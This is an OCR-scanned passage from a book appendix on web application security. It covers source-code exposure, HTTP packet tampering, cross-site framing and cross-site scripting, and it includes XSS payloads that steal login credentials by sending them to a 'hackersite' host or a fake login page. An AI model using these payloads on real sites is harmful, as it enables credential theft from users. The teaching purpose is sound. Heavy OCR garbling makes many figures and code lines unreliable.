out. I To set defaultvaluesfor cookie variables you should use the CFPARAM tag (e.g. <CFPARAM NAME="Cookie. Color DEFAULT="Red"s-) ' The error occurred while processing an element with a general identifier of (#cookie.contactid#), occupying document position (27:20) to (27:37) in the template file D:'llNETPUBlWVWVROOTlDISPLJ\Yl..lSITESM 203l.mMEMBERSLI STING. CFM. WWW. syngress.com An Introduction to Web Application Security • Appendix B Sample Files Sample files or other commonly used applications such as those revealed in Chapter 8 typically have well-documented vulnerabilities in them. Many sample files are actually remote tools for the developers, and others might simply demonstrate the system's features. Another common mistake that can have devastating consequences is simply mis- naming a file extension, as we explored in Chapter 3. Extensions are mapped in the Web server, and this is how they know a page is supposed to be executed on the server as opposed to simply sent to the browser. Any page that contains server-side code requires an extension that the server will recognize and wiU Figure B.5 shows the application mappings for Internet Information Server; here it is clear that the Web server relies on proper extensions to understand how to process a fde. Figure B.5 IIS Application Mappings Bad Extensions execute. App Mappings j App Options ] App Debugging ] P Cache ISAPI applications -Application Mappings Extension | Executable Path I Verbs asp C:\WINNT\svstem32\inetsrv\asp.dll asa C:\WI N N T \svstem32\inetsrv\asp. dll shtm C:\WI N N T \svstem32Sinetsrv\ssinc dll shtml C:\WI N N T \svstem32\inetsrv\ssinc dll stm C:\WI N N T \siJstem32\inetsrv\ssinc dll pi C:\Perl\bin\perl ewe '%s" %s pin C:\Perl\bin\perlis.dll asay C:\WINNT\Microsoft NET\FrameraorkV ascx C:\WINNT\MicrosoftNET\FrameraorkV ashy C:\WINNT\MicrosoftNET\FrameraorkV asmy C:\WI NNT\MicrosoftNET\Framework\. asDK C:\WINHT\MiorosoftHET\FrameworkV I5ET,HEAD I3ET,HEAD I3ET,P0ST I3ET,P0ST I3ET,P0ST^ I3ET,HEAD ISET.HEAD GET.HEAD GET.HEAD GET.HEAD GET.HEAD GET.HEAD' Add I Cancel Help With the wrong extension, the server will simply send the text file to the browser, completely revealing the server-side source code. Unfortunately, many 450 Appendix B • An Introduction to Web Application Security developers have actually been trained to give their files nonexecutable extensions, particularly server-side include files (.inc files). Figure B.6 shows the results of a query asking for a very common filename given to the files that define database connectivity in certain PHP applications. Although the number of hits might sound low, remember that this is only one specific filename, and these all had to be exposed to Google via directory browsing to be indexed. In reality, a huge number of include files with the .inc extension are running in Web appUcations right now. Figure B.6 Include Files Are a Common Source of Server-Side Code Results 1 - 10 of about 147 for intitle:"lndex of "dbconn.inc". (0.35 seconds) Most dictionary attacks ask for commonly used include files, but this attack isn't limited to include files by any means; any page that contains server-side code that has the wrong extension on it will leak that source code. Likewise, any archive files left on the server (such as tarballs or ZIP files) are subject to down- load along with their contents, whether HTML or code. Figures B.7 and B.8 show how a copy of a file with an improper extension reveals its source code. Since the extension .bak doesn't correlate with any application mappings, the server doesn't realize that the page is supposed to be executed and performs a "read" operation on it instead — yielding its source code to the lucky viewer. Note that although the examples here show Active Server Pages running on Internet Information Server, this issue is by no means limited to that platform; this page is chosen merely for the sake of demonstration. These issues exist on all platforms, including Java and PHP applications. www. syngress.com An Introduction to Web Application Security • Appendix B 451 ure B.7 Revealing Source Code with an Improper Extension '3 Windows Shell Scripting.com - Microsoft Inteinel Expl File Edit View Favorites Tools Help Address htlp./yi 27.0.0.1 /lorumydisplayji GOO^C- I Hi Mor ~3 ^ P I *» I 0 I O-^l B a - ^ I ^Hi QMor Advanced Sample Scripts Other Resources WindowsShellScriptlng.com The best source on the web for Windows Shell Scripting New Content Added August 16th, 2001 Thank you ! Windows Shell Scripting -- General Area for Scripting Questions etc. (1 messages) CH Scripts -- Post your scnpt snippets here. Search the ionutis fiir a keyword: I Tey Our New Search \ Atiwanced Searrh'Ji "rr ure B.8 Active Server Page with the Correct Extension ^ http://1 27.0.0.1 /foium/displav_foium.bak - Microsoft Inteinel Explor Help Address liUpV/l 27 0.0.1 /( o rum /displa y. I o rum. bak~ Google ' I Hi Mor ~3 SirJCLUDE FILE="inclucles/c essForuiiiPage True '== EEGirj MAIN ===================================== Sub Hain[] Dim obJForuitiRS, ob j ITessageRS Dim oJajForuitiCountPS, ob j HessageCountRS Dim stcThreadList Dim iActiveForumld, lActiveForumiHaiiiie Dim iForumHessageCount Dim iPer iodLooper Dim iPeriodToShom Dim iPeEiodsToGoEac}!: Dim 3ti;Foi:ui[iBi;eakdo"ttrn.Type Dim dStartDate Dim dEndDate iActiveForuitild = Request. . Quer^String [ "fid" ) If IsWumeric [ iActiveForuiiiId) Then iActiveForumld = C Int [ iAct iveForumId I I I |0 Trusted sites www. syngress.com 452 Appendix B • An Introduction to Web Application Security System Documentation System documentation of one form or another can also often be found on sites, as we discussed in Chapter 8. This documentation is usually in the form of Readme files but can also be complete online manuals. Although these might be helpful while developing a system, they must not be on anything in production. The same can be said for test fdes: Remember that these are pages where a developer was testing something, and these pages are usually broken. The error messages gleaned from these pages can be amazingly helpful because they tend to slip under the radar of any administrative housekeeping. These were just some choice examples of frequently occurring issues. Obviously there's no limit to the amount of junk that collects on a Web server over time; chalk it up to poor housekeeping or just "Internet entropy." When you're fishing for files, use your imagination, but naturally, prioritize items that will help you further the testing. Defending your site fr^om these content issues is easy once you understand the impact even relatively benign items can have. In general, a few basic practices can help mitigate content-related issues: ■ Ensure that all files have a script extension, even if the page only con- tains HTML. For example, ASP code in an HTML file wiU not be exe- cuted, it wiU be displayed to the browser, but an .asp file that only contains HTML wiU still serve the HTML fine. ■ Clean up your Web directories. Ensure that only intended pages are pre- sent, and delete anything that doesn't belong, especially sample applica- tions. On most systems it's pretty easy to pick out the files that don't belong. When in doubt, ask the developers. ■ Disallow HTML comments in code. Allow only server-side comments. If the page is only HTML and requires a comment, insert a server-side comment within script delimiters, such as: <HTML> Text and stuff </br> More text and stuff and a <% 'server side comment %> that won't make it to the browser. Of course, this works only if you run everything with a script extension. www. syngress.com An Introduction to Web Application Security • Appendix B 453 ■ Be aware of what is transmitted in your cookies and post data. Even though these aren't readily viewable in a browser, they are immediately apparent to a hacker, as we'U see later. Hidden Form Fields, JavaScript, and Other Client-Side Issues A large number of mechanisms are available to the developer in the client-side code, such as hidden form fields and JavaScript; there are well-known issues with these as well. For example, many developers use hidden form fields for every- thing from session identifiers to view state controls. None of these are issues if done properly; the fact that a session ID is in a hidden form, for example, doesn't make the identifier itself any more or less secure than if it appeared in the URL. However, many developers actually still believe that hidden form fields are actually hidden from the user. Unfortunately, this couldn't be further from the truth. They are called "hidden" because they don't render in the browser view, but they are quite plainly accessible in the HTML source and raw packets. In the late 1990s "client-side pricing" — hidden form fields that actually passed the price of an item from page to page in the shopping cart — was common. By simply saving the HTML to disk and modifying it, a hacker could actually change the price of a product when checking out. Sadly, this exact issue still exists today, but in extremely limited numbers of occurrences compared to the past. The old-fashioned way of manipulating content was to save the Web page to disk, modify the local file, and use it to submit a modified request to the server. This, however, is a terribly mundane way of going about it. It all gets so much easier when you drill down to the packet level. Additionally, a great deal of infor- mation is exposed in the packet that simply isn't available without viewing the raw packet. Before getting into any real code attacks, you have to understand how HTTP packets work and how to manipulate them to directly submit tam- pered data to the Web application. Playing with Packets All communication between the browser and server is done via HTTP requests and responses. As an application-level protocol, HTTP is wrapped into lower- level protocols, so you don't need to worry about them. Every time you load a Web page into your browser, the browser makes multiple requests to the server as www. syngress.com 454 Appendix B • An Introduction to Web Application Security it downloads images, scripts, and other elements. When you submit a form, the browser submits the data you've entered, along with any hidden form values and any possible effects of JavaScript, to the server in a request, almost always via either a GET or a POST. An HTTP GET passes information to the server by appending the informa- tion to the end of the page name as show in Figure B.9. In a P05T request, however, the information is not appended to the URL but is rather submitted in the body of the request packet, as shown in Figure B.IO. Many developers believe that P05T requests are actually more secure than GETs. because the information is not exposed in the address bar of the browser. In reaUty a POST is just as exposed as a GET in the packet and equally subject to tampering. There is, however, one distinct diiierence between a GET and a POST, data persistency. Anything in a URL (such as quevystving information from a GET) can persist in many areas far beyond the Web developer's control. These include: ■ The browser's history cache ■ The browser's bookmarks ■ Any outbound proxy logs ■ Any inbound proxy logs ■ Any firewall logs ■ Web server logs ■ Web server traffic reports (which read the server logs) ■ Referrer strings, which could actually send the information to a different site Therefore, it is always a good idea for any Web forms to submit via a POST instead of a GET This is merely to avoid this issue of the data living everywhere, however, and does absolutely nothing to secure the data. www. syngress.com An Introduction to Web Application Security • Appendix B 455 Figure B.9 An HTTP GET Packet GET /brow!e.asp?Departnnent=Mens^isle=Shirt!S:Color=Elue HTTP/1.0 Host: www.onlineretailer.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Gecko/20040G1 4 FirefoK/0.9 StumbleUpon/1 .995 Accept: teKt/Knnl,application/Knnl,application/xhtnnl+Knnl,teKt/html;q=0.9,teKt/plain;q=0.SJnnage/png,V;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: IS0-S859-1 ,utf-8;q=0.7,";q=0.7 Keep-Alive: 300 Cool<ie:Q29L^3JhdHVsV>;Rpb25zlC4LiLiB5b3UgVXJIIHZIcnkgMTMzNw==| Connection: Close Figure B.10 An HTTP POST" Packet POST /brome.aspHTTP/1.0 Host: www.onlineretailer.com tJser-Agent: Mozilla/5.0 (Windows; tJ; Windows NT 5.0; en-tJ£; rv:1.7) Geot;o;20040G1 4 FirefoK/0.9 £tumbletJpon;i .995 Acoept: tewt/wml,applioation/HrT^LapplicationyHf^tml+xrT^LteKt/f^tml;q=0.9,teHt/plain;q=0.8Jmage/png,"/";q=0.5 Acoept-Language: en-us,en;q=0.5 Accept-Encoding: gzip^deflate Accepl-Cliarsel: l£0-8859-1,ult-8;q=0.7,";q=0.7 lieep-Alive: 300 Cooliie:eTN^IGwzMzduMzU1IGIzl(3NyJWtJlxNGw= Connection: Close Content-Lengtfi: 39 Department=t^ens£Aisle=5fiirts^CQlor=Blue In both a GET and a POST, the information is a concatenated string com- posed of a parameter name and the value of that parameter. Some fairly standard delimiters are used to help the server interpret the data, as shown in Figure B.ll. Figure B. 11 Components of the URL /browse.asp?Department=Mens&Aisle=Shirts& Color=Blue parameter and value pair Question mark seperates the page name from the querystring Equal signs seperate the name of the parameter from the value Ampersands separate multiple sets of parameters By intercepting packets from the browser, you can see all form data sub- mitted, including hidden form field values and the effects of any JavaScript that executed. www. syngress.com 456 Appendix B • An Introduction to Web Application Security Not all information is transmitted via queries and post data, however. A Web application developer has fuU access to aU areas of the packet and will often store information in the cookie or even go so far as to create custom headers to store data. All areas of the packet are subject to viewing and tampering, and per- foruTing it at packet level is easy and efficient. Figure B.12 shows a raw request with an interesting cookie being sent to the server. Figure B.12 An HTTP Request Showing a Cookie Transmitted to the Server GET /test2.as:p HTTP/1.0 Host: 127.0.0.1 User-Agent Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7) Geclto/20040G14 FirefoH/0.9 StumbleUpon/1.995 Accept: text/>:ml,application/>:ml,application/>:htnnl+Kml,teKt/htnnl;q=0. 9,te>:t/plain;q=0. 8 Jmage/png,''/'';q=0. 5 ^ccept-Language: en-Lis,en;q=0.5 Accept-E needing: gzip,deflate Accept-Charset: ISO-8359-1 ,utf-3;q=0.7,";q=a7 Keep-Alive: 300 Connection: Close Cooliie: auth=adminX3Dfalseg2GauthlevlelX3D1;ASPSESSIONIDASDSAASB=MAKJPIICIEJNGJMEANEPAHGL Viewing and Manipulating Packets Before you can begin modifying packets, you have to actually get access to them. As we know, the browser wiU only display the URL (and any accompanying querystring) and the body (the HTML) or the HTTP response. The only portion of an HTTP request that is displayed is the URL and querystring itself; POST statements are not viewable in a browser. There are several ways of viewing the actual raw packets themselves. The first method that comes to mind for most people is packet sniffing, which wiU indeed show you the fuU conversation between browser and server. A favored packet sniffer is Ethereal, pictured in Figure B.13, which displays the packets in an easily read format. www. syngress.com An Introduction to Web Application Security • Appendix B 457 Figure B.I 3 Ethereal Makes Easy Work of Network Analysis # The Etheieal Nelwoik Analvzei mBf3 File Edil View Go Capture Analyse Statistios Help illFiiter: ||http request _-J >EHpreEsien..| ^. Clear -5^ Apply | |DstPoit |Piotocol |lrlo Time Ho ^iJ HTTP GET /iniages/hseal .gif HTTP/1.1 HTTP GET /images/gs/heacl.gif HTTP/1.1 HTTP GET /iniages/g3/twit2.gif HTTP/1.1 HTTP GET /images/gs/kotc. gif HTTP/1.1 HTTP GET /itiiages/gs/college.gif HTTP/1.1 HfTTP GET /iniages/g5/uniter.jpg HTTP/1.1 HTTP GET /itnages/gs/dra-pt.gif HTTP/l.l HTTP GET /iniages/g3/w2 .gif HTTP/l.l HTTP GET /images/rsb.gif HTTP/l.l 0" ' Hypertext Transfer Protocol XT GET /rews/3004/111004.asp HTTP/l.l\r\n Request Method: GET Host: www.whitehouss.org\r\rr User-Agetit: Mozilla/5.0 Cwirrdows; U; Witidows NT 5.0 Accept: text/xml , appl i cation/xml , appl i cation/xhtml + en-Uf Til ,te; Manage gimporL SI,™ lesponses that ar POST requests http request ? http response http response http request n :ode 2DD 3ode!=2DQ .thod = "PCST" 00 0? 5b 10 5S fS 00 02 02 45 dc 21 40 00 SO 05 Se a2 05 5e 00 50 9c 3b 44 eS 17 91 00 00 47 45 32 30 30 34 2f 31 31 31 48 54 54 50 2f 31 2e 31 77 77 77 2e 77 5S 69 74 72 67 Od Oa 55 73 65 72 3d 80 f7 fS OS 00 45 00 fd a4 cO aS 00 02 cf 9f &6 7c 3f ad be f2 50 IS 54 20 2f 6e 55 77 73 2f 30 30 34 2e 51 73 70 20 Od Oa 46 6f 73 74 3a 20 65 68 5f 75 73 65 2e 5f 2d 41 57 65 5a 74 3a 20 ^□K I y Apply 2004/111 HTTP/l.l WW. whit rg . . Usar T /news/ 004. asp . .Host: ehouss.o -Agent: I VDeviceVNPF_ jl P' 4050 D: 52G M: 0 I Be prepared, however, to sift through a large number of packets because the server response can actually take place over multiple packets. If you're using Ethereal, be sure to take advantage of its filtering and coloring rules to sort the chaff from the wheat. At some point, you'll need to actually modify the packets, not just view them, and this takes more than a sniffer. There are several different ways of modifying packets, and both are used extensively. For a "one-off" request, simple Telnet will do the trick; simply Telnet to the server on port 80 (or the appropriate port), type in your packet, and ternTinate the packet with two carriage returns; the server will respond accordingly. Typing in packets by hand gets old quickly, however, and to perform repetitive tasks you'll want to script out the work. When nothing but manual tampering will do, nothing beats using a local proxy. Local proxies can be garnered fi-om many sources, but they all basically do the same thing: let you view and modify raw HTTP packets. The real differentia- tors are in details such as the ability to chain through a network proxy, the ability to use SSL, and the ability to modify response packets in addition to request packets. Most have extremely functional interfaces as well, combining all packets and matching responses to their requests. They work by simply accepting the packet from your browser, displaying the packet to you for modification, then forwarding it to the server and displaying the server response. www.syngress.com 458 Appendix B • An Introduction to Web Application Security By letting the browser make the request for you, all you have to do is modify the area you're interested in. This is extremely efficient in complex applications that can change key areas with each request — now your browser does all the heavy lifting, leaving you free to tweak where desired. Some proxies will even allow you to search and replace packet contents automatically. Figure B.14 shows SPI Proxy configured to automatically remove all Cookie and Referer headers and to modify the User- Agent header. Being able to modify the raw packet automatically is a great benefit — one application we played with had a "maximum login attempts" counter in its cookies; by configuring the filters in the proxy, we automatically reset the counter to the maximum with each request and was able to pound the login fields all we wanted. Of course, just maintaining that count in the client is an issue unto itself. Figure B.14 Using SPI Proxy to Perform Automated Search and Replace of HTTP Elements 9 SPI PioHv 1 j^^^^^^^y Tools Help ^^^^^^^ I^H^^^^^B 1 Time 1 Request^^^^^^^^l It |H 127.0.0.1:80 5:52:47PM GET Aesl2asp HTTP/1.0 - 0 127 0 01:80 5 53:15PM (Slate-Sel)GET Aest2.asp HTTPyi.O H 12710.1:80 5 53:51 PM (Slole-Sel)GET AesC.osp HTTPVI.O H cnn.com:80 7:01:15 PM GET/HTTP/1.0 □ www.cnn.comiSO 7;01:1SPM (Hidden-Field|GET / HTTP/1.0 | 0 wwi/^. cnn.com: SO 0 Settings ■^^^H-|nhl View 1 Split 1 Info ] Bro' Prox^ RequesI Response Searoh | 1^°^ 1 Replace J | <inpul tippe="hidden" nai <inpul tippe="hidden" nai < [0<id colspan=' '1 2' 'x img heighl="3" border="0" hsp; <tD width="8" height="SO" bore . ctd bgi width="75S"height="1"bo Ctd ro^i^ width="3" height="SO" hsp. Flag Field Search [Replace |v^ U Headers ll-Modified-Since[''\r\n]+ 0 n Headers ll-N one-M atch["\r\n]+ 1 □ □ Headers Llser-Agentr\[Vnl+ 1 □ □ Headers Referer: [■"\r\n]+ □ 0 Headers MaximumLogirV^Hempts-.'' Max!mumLogirAttempts=5555 Help 1 OK 1 Cancel <tr bgcolo[="ttBSDSEO" valign="middle"> <td><img s[c="http:y/i.a.cnn.netycnn/.elementyimg/'1.1/sea[chbar/search.gif" width="70" height="15" hspace="15" vspace="0" bo[der="0"></td> <td><input i:vpe="radio" name="sites" value="web" checked></td> ^td nowrapxspan class="cnnFormTentB" sl:yle="cDlor:tt3S9">The Web</span></td> <td>?(ribsp;?:nbsp:<Ad> ^td>^inputl:ype="radio" name="sites" value="cnn"><Ad> <td><span class="cnnFormTentB" si:vle="color:tt3GS;">CNN.com</span><Ad> ^td^E^nbsp;^;nbsp:■^Ad> <td><input i:ype="tenr name="query" class="cnnFormTenr value^"" title="Enter tent to searcb ^ 1 Found B D ccurences | R equssts: 119 | S essions: 46 ^ i Once you have the ability to actually modify packets, you're on your way to actively testing for logical vulnerabilities. Unfortunately, there's simply no way to give a full education on all the myriad possibilities that exist in exploiting appli- cation logic, for they are as diverse as the applications themselves. In the next www. syngress.com An Introduction to Web Application Security • Appendix B 459 section, however, we look at some basic examples of well-known vulnerabilities and exploits. Code Vulnerabilities in Web Applications The majority of really serious vulnerabilities in Web application don't occur in the "content" level per se; they're based on exploiting failures in the logic of the server-side code. These are more difficult to discover because they require actu- ally exercising the application in various ways to determine the behavior of the back-end code. Client-Side Attacks when you visit a Web page, the main HTML file comes from that server but can reference elements that are spread across the Internet. Advertisements, streaming media, images, and other objects are often hosted aside via caching services that reduce the total bandwidth consumed by the main site. Browsers know to load these within the main page, even though their source is offsite. This behavior, although required for the Web to work properly, can expose the browser to many different attacks known as client-side attacks. Client-side attacks can occur in many forms; drive -by ActiveX downloads is one example, as is a malicious Java applet on a Web site. These are all attacks from the Web site itself; the owner of the site is attacking the hapless users of it. Rarely will the owners of these systems engage a penetration tester or auditor! There are, however, plenty of legitimate Web sites that have vulnerabilities that allow a malicious third party to use the sites to attack browsers. Instead of trying to break into an application head-on to get inside and steal sensitive information, the attacks target the users of that application to gain access to information. Client-side attacks are often carried out through some sort of phishing scam: sending out extremely convincing-looking e-mails that try to attract people to a mock Web site that mimics a well-known real site and then get them to enter their private information into the mock Web site. These scammers typically employ a variety of URL obfuscation techniques to hide their true identity. This type of attack requires no vulnerability on the actual Web application; rather, it is sheer deception. The weakness in this type of attack is that a sharp consumer might take notice of the suspicious URL, recognizing that it doesn't belong to the real organization. www. syngress.com 460 Appendix B • An Introduction to Web Application Security Recently, a bank's customers were being phished with a different type of attack that took advantage of a vulnerability in the real bank's Web application — one called cross-site framing. In this case, the phishing attack didn't need to employ a mock Web site; instead it sent the victims to the real bank Web site, a trusted domain. The phishers exploited a page that intentionally displayed third- party content. The location of the content to be displayed in the frame was spec- ified in the URL, as demonstrated in Figure B. 15. There are ways to do this safely by examining the location specified within the server-side code to ensure that the URL passed to the page is legitimate, but in this case the needed valida- tion wasn't performed and the page would load into the frame any content that was specified in the URL. The phishers then created a mock login form on another site and specified the location of that form in the URL, as demonstrated in Figure B.16. Now the phishers' Web site was framed within the original site. Figure B.I 5 The Frame Source in This URL Is a Dead Giveaway http7/www.site.com/main/dspPage.asp?page=http://'news_site.com/latestnews.jsp Figure B.16 The Cross-Site Framing Bait By phishing that URL around through legitimate-looking e-mails, the scam- mers then attempted to dupe the bank's actual victims into logging into their form. Figure B.17 shows the modified URL that can now be used in the phish bait. Note that the host and domain is the original site, so even a consumer who scrutinizes those still stands a chance at being fooled. www. syngress.com An Introduction to Web Application Security • Appendix B 461 Figure B.I 7 HTTP Response That Suggests Susceptibility to Cross-Site Scripting Request jnfo GUI IContent-T^pe: applicaticin/w-iAHAjw-form-urlencoded Content-Length: 30 Connection: Close userid^ ohnD oe&:password=jdoe24 ( Content-Length: 114 ^ Content-T^pe: tewt/html Set-Cookie: ASPSESSIONIDASDSAASB=BHKJPIICOCELOCHCABKAJLFN; path=/ Cache-control: private JohnDoe <html><b> Welcome back JohnDoe </b><br> <br><h4>Please check out the news message board posts </h4> 1 This classic example of a client-side attack demonstrates some key character- istics of such attacks: ■ They don't attack the site directly but rather indirectly through the users of the site. ■ They typically trick the main site into interacting with a third party by injecting some form of content. ■ They get to levy the trust between the users and the main site, since the third-party interaction is done by the actual, real site and not a fake one. This particular vulnerability is relatively rare, since few sites frame third-party sites and actually embed the fuU URLs into their queries. A much more com- monly found vulnerability is cross-site scripting (abbreviated XSS). Cross-site scripting exists when the Web site accepts input that it shouldn't (as in the pre- vious example) but then sends that input back to the browser. This could be in a login page, where the username is displayed back to the browser, or a search field, where the search terms are displayed but can actually exist anywhere. For example, look at the request and response in Figure B.17. We see that the page cklogin.asp takes the value supplied for the Userid parameter and displays that value back in the page. This is the first test necessary to identify XSS; finding the replay where input is echoed back as output. For this to be an actual XSS vulnerability, however, it must accept and replay the JavaScript without per- forming any validation on it. www. syngress.com Appendix B • An Introduction to Web Application Security The simplest way to test for this is to simply enter script into the parameter and see if it is echoed back to the browser. Figure B.18 shows a request packet being modified; the legitimate value for the parameter named userid is replaced with a simple Java script. Figure B.18 HTTP Request Being Modified to Insert a Script Request info 1 GUI 1 Connection: Close Cookie:ASPSESSIONIDASDSAASB=MHKJPIICJJJKDJPFPLIDPDHK userid=iBBffiiBIHl]lH^SllBBS:DassiAiord=idoe24 ' i Response Browser URL Decode Unicode Encode Unicode Decode BaseG4 Encode BaseG4 Decode Compress > Decompress > Figure B.18 also demonstrates encoding the parameters. When manipulating packets directly, you must remember that the content-length header has to be updated to reflect the new length of the post data string. It might also be neces- sary to encode the input. Web browsers do this for you automatically, and any packet editor you use should allow you to do this as well. After you've injected the script into the request, simply analyze the response. If the script comes back in the response unmodified, that parameter is vulnerable to cross-site scripting. Figure B.19 shows the script returned in our example response. The application intends to write "Welcome Back [username]" but instead writes "Welcome Back [Java Script]" since it believes the actual username is the JavaScript expression. Figure B.19 Cross-Site Scripting Vulnerability in the HTTP Response <html><b> Welcome back <script>alert()< /script </b><br> <br><h4>Please check out the news message board posts </h4> An Introduction to Web Application Security • Appendix B 463 Escaping from Literal Expressions If you can get a complete script returned in an HTTP response, the request parameter that was tested is vulnerable. Often, however, the script itself won't execute in the browser, because it was returned inside a literal statement. The server-side code returns the script, but it's in some element the browser only rec- ognizes as HTML and not as script. For instance, in Figure B.20, we see our test script returned, but this time inside an image tag. To get this script to properly execute, we need to escape the tag. Figure B.20 The Test Script Is Returned Within an Image Tag and Is Not Executed I Request ^ info ^ GUI ^ _■■ l^ I ■_l|_>|_>ll>_->_IM>_>l If ri YVYVYV ILJIIII ■_4II>_-I I '_■ '_' '_l '_■ '_l Content-Length: 31 Connection: Close Cookie:ASPSESSIONIDASDSAASB=MHICJPIICJJJKDJPFPLIDPDHK inngsrc=< script> alert()< /'script> Response Browser 1 Content-Length: 53 Content-Tiipe: text/html Cache-control: private <inng src=" <script>alert()</script> " alt="an innage"> Figure B.21 illustrates prefacing the injected script with the characters neces- sary to close the existing tag. This then separates the script from the tag, but the remainder of the tag is now "stranded" and will print on the screen as illustrated in Figure B. 22. This, along with the "broken image" icon, certainly won't suffice in a proper hack — they must be cleaned up. www. syngress.com 464 Appendix B • An Introduction to Web Application Security Figure B.21 Closing Existing Tag by Prefacing the Injected Script Request Info GUI inngsrc=' '> < script> alert()< / script> Response | Browser Content-Length: 55 iContent-TiJpe: text/html ICache-control: private |<img src=" "><script>alert()</script> " alt="an innage"> Figure B.22 Tag with Separated Script Response i Browser 0 . all^"an image "> The first task is removing the "giant red X" (which indicates the existence of a broken image link) fr^om the screen. Figure B.23 shows prefacing the injection not just with the "> combination necessary to escape the tag but now with a height and width specification that ensures the icon isn't shown at all. At the end of the injection, a metatag is opened. In the response we can see that we have successfully shrunk and closed the image, creating a nicely formed invisible tag. Figure B.24 shows the rendered results — which are, of course, completely blank now. Figure B.23 Prefacing the Injection with a Height and Width Specification Request Info GUI ICookie: ASPSESSIONIDASDSMSB=MHICJPIICJJJKDJPFPUDPDHK |imgsrc=" height=0 width=0>< s cripts alert[]<.^script><:metd ndnne=" Response 1 Browser ] ^^^^^^^^^^^^^^^^^^^^^ Cache-control: private <:img src=" "height=Owidth=0><:script>alert()<:;'script><nnetananne=" " alt="an irnage">| WWW. syngress.com An Introduction to Web Application Security • Appendix B 465 Figure B.24 Invisible Tag Results Response | i Browser , There are other ways of executing script as well. For instance, you can specify a remote script, as shown in Figure B.25, or instead embed the script into the image tag as shown in Figure B.26. Figure B.25 Loading a Remote Script Request ' [nfo ' GUI Cookie: ASPSESSIONIDASDSMSB=MHKJPIICJJJKDJPFPLIDPDHK inng3rc=" height=0 widt[i=0> < script+src=' 'http: / Ahirdpar t^sHe/Hss. is"> < rmeta name= Browser •H^BHBBI^l^BBI^BHH^^B^BI ^ I iM LJi. |_>i I r <img src=" "height=Owidth=0>< script src="http://thirdpartvsite/Kss.js"><metaname=" " alt="an i image|]> 3 Figure B.26 Using an Event to Trigger the Script Request Irnfo GUI I Connection: Close Cookie: ASPSESSIONIDASDSAASB=MHKJPIICJJJKDJPFPLIDPDHK inngsrc=real_innage.gif"+onnnouseover="alert('ha!');"><metananne= Response Browser 1 Content- 1 ype: text/titml Cache-control: private <inng src=" real_innage.gif" onnnouseover="alert('ha!'):"><nnetananne=" " alt="an image' Once the injection is tested and confirmed, the actual attack needs to be formed. The JavaScript Document Object Model (DOM) provides several extremely useful capabilities to the developer and hacker aUke. For instance, JavaScript provides access to field values and is often used by developers to www.syngress.com 466 Appendix B • An Introduction to Web Application Security ensure that required information has been entered into forms. This same func- tionality also lets the hacker access information entered into the form via a cross- site scripting attack, as demonstrated in Figures B.27 and B.28. Figure B.27 The Injected Script userid=" onnnouseciver="alert('This is what was entered into the form: \r \r' +docunrient.login.userid.value+' == '+docunnent.login.password.value)">"^password=doh!nuts Figure B.28 Accessing Form Values Via Script Request Info GUI Connection: Close Cookie: ASPSESSI0NIDASDSMSB=IIICJPIICFPCGPKt^JPh/1KQi,B0H userid=" onnnouseover="alert%28^27This+is+what+was+entered+into+the+fornn^3j 5Cr+%5Cr^27+X2Edocument%2Elogin^2Euserid%2Evalue^2BX27+%3D%3D+Xa^ 2B docijnnent%2E login^2Epassword^2E value^29^22^3E %22Scpassword=doti! nul Response ^ Browser ^ Microsoft Internet Explorer Q II Invalid login. Tiy a^ /^\^ ^^'^ entered into the form: i JotnnDoe == doNnuts Userid: JolinDoe □ K Pass: 1'°'°'°'**** Ok| Nope 1 The next step is to get the information where it can be read. This is usually done by appending it to an image tag whose source is a remote Web server that the hacker has access to, as shown in Figure B. 29. When the script is activated, the browser wiU attempt to load the image, making a call to the remote server with the stolen information in it. From there, the hacker simply has to read the Web logs for the stolen information. You can also use JavaScript to redirect win- dows and open new windows and create framesets, aU of which could display forged login pages. Figures B.30 and B.31 show an example of appending the form values to a window.open command; this is an elaborate example of the var- ious fun to be had with cross-site scripting. www. syngress.com An Introduction to Web Application Security • Appendix B Figure B.29 Passing Credentials to the Third-Party Site Via an Image Tag 467 userid=" onnnouseover="docunnenLwrite<inng heighNO width=0 src='http7/'hackersite/'+docunnenUogin.userid.value+' == '+document.login. password. value)">"&password=dQh! nuts Figure B.30 Appending Form Values to a window.open Command Request info GUI 1userid=JohnDoh" onniouseover=''window.open('http://windowsshellscriptingxoni/fakeloginpage.asp?in1='+docunien^login.userid.val^ ='+document login. password, value); £(password=doh! nuts Response Browser <form action=cklogger.asp method=post name=login> llUserid: <input tvpe=text name=userid value=" JohnDoh"onmouseover="window.open('http://windowsshellscripting.com/'fakeloginpage.asp?in1 '^='+document.login.userid.value+'&:in2='+document.login. password. value); "><br> Pass: <input tvpe=password name=password value=" dohlnuts "><br> <input type=submit value=OK><input type=reset value=Nope><br> "3 ill Figure B.31 And the Resulting Effect ^ htlp:^/ivindDwsshellsciipting.com/lakelDginpage.asp?i... HBB Rle Help Action, [change Content-Length ^ ■^pply I Address: |http:y/127.0.0.1:80ycklogger.asp j ^qquey jjnfe^] GUI , userid=JcihrDoh"onmciuseciver=S22windowS2EcipenS2SS27hltpSaiiS2FS: 2EcomS2F"fakeloginpageS2EaspS3Fin1S3DS27S2BdocumertS2ElciginS2E 2Gin2S3DS27S2B docunentS2E loginS2E pass™dS2E vdueS29S3B +!.pass Userid: | JohnDoh Pass: I OK I Nope I Search [Hespcmse ^ For \~ LireCount' 1 9 CurrentLine: 1 4 CurrentColumn' 0 Rle Edit Address [^5*1 htt p 7/ w i ndo w ss hellscript i ng.corri/ fake login page, as p'^j i^So I E ffl I ^Search O Favorites Google - I "31 ^ - ife Thank you for visiting Big Bank Do Not Close The Mam Browser Before Using Tins Link to Log Off Log Off Big Bank "Why do I need to log off? What is identity theft ? What is a noise complaint ? What steps does Big Bank take to safeguard my identity? Why does Reel Big Fish rock so hard ? [ Note, this page would have quietly logged the credentials JohnDoh - dohlnuts] I I Trusted sites Cross-site scripting made big waves a few years ago when it was discovered in several popular Web-based e-mail providers. XSS is still unfortunately a very common vulnerability in Web applications. Defensive coding techniques require www.syngress.com 468 Appendix B • An Introduction to Web Application Security strong validation of all input for script tags and certain terms, as well as HTML encoding any printed output that is directly received from the browser. Remember that anything that occurs on that page and is accessible via JavaScript is subject to theft via cross-site scripting. If the vulnerability occurs on a page that requests a username and password, those credentials are subject to theft. However, even if the page doesn't have any actual sensitive forms on it, the cookie itself can often 